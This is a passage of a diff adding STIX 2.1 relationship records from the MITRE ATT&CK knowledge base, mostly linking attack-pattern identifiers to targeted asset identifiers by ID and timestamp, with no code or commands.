"identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-06-21T14:12:20.255Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--0a5231ec-41af-4a35-83d0-6bdf11f28c65", + "target_ref": "x-mitre-asset--37fd65ed-2f82-4b94-9f70-5540d4fe6866", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--7e1a50f8-7fea-4014-8245-a2ab2320f5b2", + "created": "2024-06-27T09:38:05.329Z", + "created_by_ref": "identity--c9819289-ba54-424a-b869-e4387b5f51b0", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-06-27T09:38:05.329Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--16e94db9-b5b1-4cd0-b851-f38fbd0a70f2", + "target_ref": "x-mitre-asset--dcb786af-f1e7-449e-be48-46315c9789ca", + "x_mitre_modified_by_ref": "identity--c9819289-ba54-424a-b869-e4387b5f51b0", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--7e26d4b0-bd3c-4a82-a8b2-734cbf0dac9f", + "created": "2024-07-02T13:55:55.763Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-07-02T13:55:55.763Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--2c4d4e92-0ccf-4a97-b54c-86d662988a53", + "target_ref": "x-mitre-asset--1769c499-55e5-462f-bab2-c39b8cd5ae32", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--7e370fcc-6816-48a3-8fc7-8fc8f0221237", + "created": "2024-07-02T13:55:55.748Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-07-02T13:55:55.748Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--315f51f0-6b03-4c1e-bfb2-84740afb8e21", + "target_ref": "x-mitre-asset--0804f037-a3b9-4715-98e1-9f73d19d6945", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--7e5424d7-6fa1-40e1-8d86-6423c5303d3e", + "created": "2024-06-21T14:12:20.266Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-06-21T14:12:20.266Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--2b742742-28c3-4e1b-bab7-8350d6300fa7", + "target_ref": "x-mitre-asset--5029a500-3fc9-49db-825f-932ac0fc21ad", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--7e7410e1-e5ba-4ae6-be09-6edbd90e425a", + "created": "2024-07-02T13:55:55.763Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-07-02T13:55:55.763Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--0c2d00da-7742-49e7-9928-4514e5075d32", + "target_ref": "x-mitre-asset--1769c499-55e5-462f-bab2-c39b8cd5ae32", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--7e742477-0bb2-4ca9-9644-d88ab262c66f", + "created": "2024-07-02T13:55:55.767Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-07-02T13:55:55.767Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--d2c4e5ea-dbdf-4113-805a-b1e2a337fb33", + "target_ref": "x-mitre-asset--1769c499-55e5-462f-bab2-c39b8cd5ae32", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--7e7fb66c-b16f-49ee-b19f-ffd211fbb181", + "created": "2024-07-02T13:55:55.758Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-07-02T13:55:55.758Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--0bda01d5-4c1d-4062-8ee2-6872334383c3", + "target_ref": "x-mitre-asset--14932ed5-1098-4cc1-9f57-159ab7366787", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--7e89be95-be18-4ba3-8016-491a48e6e73e", + "created": "2024-06-27T09:02:18.518Z", + "created_by_ref": "identity--c9819289-ba54-424a-b869-e4387b5f51b0", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-06-27T09:02:18.518Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--43f2776f-b4bd-4118-94b8-fee47e69676d", + "target_ref": "x-mitre-asset--7818eb69-414c-43d2-9816-77e90a710edc", + "x_mitre_modified_by_ref": "identity--c9819289-ba54-424a-b869-e4387b5f51b0", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--7e996a31-d2aa-4736-9ee6-72705927c532", + "created": "2024-07-02T13:55:55.750Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-07-02T13:55:55.750Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--ac08589e-ee59-4935-8667-d845e38fe579", + "target_ref": "x-mitre-asset--0804f037-a3b9-4715-98e1-9f73d19d6945", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--7eabb196-ab08-4b5d-8b29-81f6c71074a1", + "created": "2024-07-02T13:55:55.764Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-07-02T13:55:55.764Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--43c9bc06-715b-42db-972f-52d25c09a20c", + "target_ref": "x-mitre-asset--1769c499-55e5-462f-bab2-c39b8cd5ae32", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--7ebee5d3-ce7f-436c-8b4a-087363d6b858", + "created": "2023-09-29T16:32:46.335Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2023-09-29T16:32:46.335Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--2dc2b567-8821-49f9-9045-8740f3d0b958", + "target_ref": "x-mitre-asset--973bc51e-c41e-4cec-ac03-9389c71f3d0d", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--7ed1ad67-942a-424e-ad81-8b69a4f0c706", + "created": "2023-09-28T20:28:16.122Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2023-09-28T20:28:16.122Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--b52870cc-83f3-473c-b895-72d91751030b", + "target_ref": "x-mitre-asset--75f810ad-b678-4c57-b93b-fdc79bba0c04", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--7efa1a31-da21-4925-aab0-96a012d5b2a7", + "created": "2023-09-29T17:43:22.756Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2023-09-29T17:43:22.756Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--b14395bd-5419-4ef4-9bd8-696936f509bb", + "target_ref": "x-mitre-asset--68388d4f-8138-420b-be2b-5a7dfe9ff6b4", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--7f06d679-3747-4877-9584-ffca84195d4b", + "created": "2024-07-02T13:55:55.765Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-07-02T13:55:55.765Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--767dbf9e-df3f-45cb-8998-4903ab5f80c0", + "target_ref": "x-mitre-asset--1769c499-55e5-462f-bab2-c39b8cd5ae32", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--7f1377f1-6b15-4e77-8b98-cb520b2140f6", + "created": "2024-07-02T13:55:55.765Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-07-02T13:55:55.765Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--7c0f17c9-1af6-4628-9cbd-9e45482dd605", + "target_ref": "x-mitre-asset--1769c499-55e5-462f-bab2-c39b8cd5ae32", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--7f17c751-4ee7-4531-99b7-09880a4c5dd6", + "created": "2024-06-21T14:12:20.274Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-06-21T14:12:20.274Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--b4409cd8-0da9-46e1-a401-a241afd4d1cc", + "target_ref": "x-mitre-asset--5029a500-3fc9-49db-825f-932ac0fc21ad", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--7f297acc-8edb-4191-a8ce-3e867b2f20dc", + "created": "2020-03-02T14:30:05.457Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2022-04-25T14:00:00.188Z", + "relationship_type": "subtechnique-of", + "source_ref": "attack-pattern--32ad5c86-2bcf-47d8-8fdc-d7f3d79a7490", + "target_ref": "attack-pattern--ac9e6b22-11bf-45d7-9181-c1cb08360931", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--7f2cb6da-124d-4bb9-9c41-7ae0dac5e98d", + "created": "2024-07-02T13:55:55.754Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-07-02T13:55:55.754Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--565275d5-fcc3-4b66-b4e7-928e4cac6b8c", + "target_ref": "x-mitre-asset--14932ed5-1098-4cc1-9f57-159ab7366787", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--7f306f1f-bd04-460f-929a-621f458dcd04", + "created": "2020-02-25T18:34:38.377Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2022-04-25T14:00:00.188Z", + "relationship_type": "subtechnique-of", + "source_ref": "attack-pattern--4d2a5b3e-340d-4600-9123-309dd63c9bf8", + "target_ref": "attack-pattern--5b0ad6f8-6a16-4966-a4ef-d09ea6e2a9f5", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--7f6d04ca-e1d6-4091-8e85-8c7ce8eec8ff", + "created": "2024-07-02T13:55:55.762Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-07-02T13:55:55.762Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--00f90846-cbd1-4fc5-9233-df5c2bf2a662", + "target_ref": "x-mitre-asset--1769c499-55e5-462f-bab2-c39b8cd5ae32", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--7f97ddb4-1b3d-48f5-a6cc-c0f7b23f62eb", + "created": "2024-07-02T13:55:55.763Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-07-02T13:55:55.763Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--1e9eb839-294b-48cc-b0d3-c45555a2a004", + "target_ref": "x-mitre-asset--1769c499-55e5-462f-bab2-c39b8cd5ae32", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--7f992cc2-8a40-4283-818b-860ae5771632", + "created": "2024-06-21T14:12:20.259Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-06-21T14:12:20.259Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--64196062-5210-42c3-9a02-563a0d1797ef", + "target_ref": "x-mitre-asset--37fd65ed-2f82-4b94-9f70-5540d4fe6866", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--7fa86c21-5063-48db-8555-fe63c34ae28b", + "created": "2024-06-27T09:38:37.107Z", + "created_by_ref": "identity--c9819289-ba54-424a-b869-e4387b5f51b0", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-06-27T09:38:37.107Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--cba37adb-d6fb-4610-b069-dd04c0643384", + "target_ref": "x-mitre-asset--dcb786af-f1e7-449e-be48-46315c9789ca", + "x_mitre_modified_by_ref": "identity--c9819289-ba54-424a-b869-e4387b5f51b0", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--7fb48474-51d8-4321-9f9a-83f07b1fc18b", + "created": "2024-07-02T13:55:55.754Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-07-02T13:55:55.754Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--53ac20cd-aca3-406e-9aa0-9fc7fdc60a5a", + "target_ref": "x-mitre-asset--14932ed5-1098-4cc1-9f57-159ab7366787", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--7fc0a640-442b-4f02-a166-db405e3b55ef", + "created": "2024-06-26T14:28:28.035Z", + "created_by_ref": "identity--c9819289-ba54-424a-b869-e4387b5f51b0", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-06-26T14:28:28.035Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--fdc47f44-dd32-4b99-af5f-209f556f63c2", + "target_ref": "x-mitre-asset--65c04f96-37e5-4358-ab16-087e240c1b6e", + "x_mitre_modified_by_ref": "identity--c9819289-ba54-424a-b869-e4387b5f51b0", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--80097c2f-076d-4433-a336-3dc43466ef3f", + "created": "2024-06-21T14:12:20.266Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-06-21T14:12:20.266Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--22905430-4901-4c2a-84f6-98243cb173f8", + "target_ref": "x-mitre-asset--5029a500-3fc9-49db-825f-932ac0fc21ad", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--8010dcfd-b9d2-4da3-8157-79060d821403", + "created": "2024-06-26T13:55:57.863Z", + "created_by_ref": "identity--c9819289-ba54-424a-b869-e4387b5f51b0", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-06-26T13:55:57.863Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--36b2a1d7-e09e-49bf-b45e-477076c2ec01", + "target_ref": "x-mitre-asset--2821ca87-8f61-47e5-a3bf-524f65573d77", + "x_mitre_modified_by_ref": "identity--c9819289-ba54-424a-b869-e4387b5f51b0", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--80171399-496a-40a0-9a6d-8505324a5108", + "created": "2024-06-21T14:12:20.260Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-06-21T14:12:20.260Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--960c3c86-1480-4d72-b4e0-8c242e84a5c5", + "target_ref": "x-mitre-asset--37fd65ed-2f82-4b94-9f70-5540d4fe6866", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--8022ab69-14f9-46ac-8e8d-5c34cde52493", + "created": "2024-06-21T14:12:20.276Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-06-21T14:12:20.276Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--e6415f09-df0e-48de-9aba-928c902b7549", + "target_ref": "x-mitre-asset--5029a500-3fc9-49db-825f-932ac0fc21ad", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--802fc248-2b5c-47f7-a12f-e36b2b834b70", + "created": "2024-07-02T13:55:55.752Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-07-02T13:55:55.752Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--1ecfdab8-7d59-4c98-95d4-dc41970f57fc", + "target_ref": "x-mitre-asset--14932ed5-1098-4cc1-9f57-159ab7366787", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--8046b711-d582-49a6-8832-b3ec26b2b0ca", + "created": "2024-07-02T13:55:55.755Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-07-02T13:55:55.755Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--7bdca9d5-d500-4d7d-8c52-5fd47baf4c0c", + "target_ref": "x-mitre-asset--14932ed5-1098-4cc1-9f57-159ab7366787", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--80612187-b7c9-4e24-9d48-7bdeea17d4d5", + "created": "2024-06-21T14:12:20.256Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-06-21T14:12:20.256Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--22905430-4901-4c2a-84f6-98243cb173f8", + "target_ref": "x-mitre-asset--37fd65ed-2f82-4b94-9f70-5540d4fe6866", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--80667e75-0f66-4b89-a32c-ac9cdf1aaf01", + "created": "2024-06-26T15:34:28.217Z", + "created_by_ref": "identity--c9819289-ba54-424a-b869-e4387b5f51b0", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-06-26T15:34:28.217Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--09c4c11e-4fa1-4f8c-8dad-3cf8e69ad119", + "target_ref": "x-mitre-asset--8a455821-6e6e-49b0-9b6d-ac01011263c1", + "x_mitre_modified_by_ref": "identity--c9819289-ba54-424a-b869-e4387b5f51b0", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--8074bdff-7555-478e-a45e-bb042e5719ab", + "created": "2020-10-02T16:57:45.197Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2022-04-25T14:00:00.188Z", + "relationship_type": "subtechnique-of", + "source_ref": "attack-pattern--17fd695c-b88c-455a-a3d1-43b6cb728532", + "target_ref": "attack-pattern--55fc4df0-b42c-479a-b860-7a6761bcaad0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--80843618-513d-4bec-8e2b-226242d5b421", + "created": "2024-06-21T14:12:20.260Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-06-21T14:12:20.260Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--86850eff-2729-40c3-b85e-c4af26da4a2d", + "target_ref": "x-mitre-asset--37fd65ed-2f82-4b94-9f70-5540d4fe6866", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--808e8b62-14cc-44ad-a4f2-518685bef6c0", + "created": "2024-05-23T03:48:14.726Z", + "created_by_ref": "identity--c372c93e-faf6-4269-9ca9-90dff6035730", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-05-28T02:47:55.087Z", + "description": "Asset Mapping Rationale: Adversaries may access network configuration files to collect sensitive data about the device and the network. ", + "relationship_type": "targets", + "source_ref": "attack-pattern--52759bf1-fe12-4052-ace6-c5b0cf7dd7fd", + "target_ref": "x-mitre-asset--dcb1d1c1-b195-45bf-b4cf-5b98c5b859a5", + "x_mitre_modified_by_ref": "identity--c372c93e-faf6-4269-9ca9-90dff6035730", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--80a0c481-c3a8-42d1-9aba-a082e072e0b6", + "created": "2024-06-26T15:32:13.758Z", + "created_by_ref": "identity--c9819289-ba54-424a-b869-e4387b5f51b0", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-06-26T15:32:13.758Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--ceaeb6d8-95ee-4da2-9d42-dc6aa6ca43ae", + "target_ref": "x-mitre-asset--8a455821-6e6e-49b0-9b6d-ac01011263c1", + "x_mitre_modified_by_ref": "identity--c9819289-ba54-424a-b869-e4387b5f51b0", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--80b6d1df-85f0-45cf-8b04-7222fb979720", + "created": "2024-07-02T13:55:55.761Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-07-02T13:55:55.761Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--cd25c1b4-935c-4f0e-ba8d-552f28bc4783", + "target_ref": "x-mitre-asset--14932ed5-1098-4cc1-9f57-159ab7366787", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + 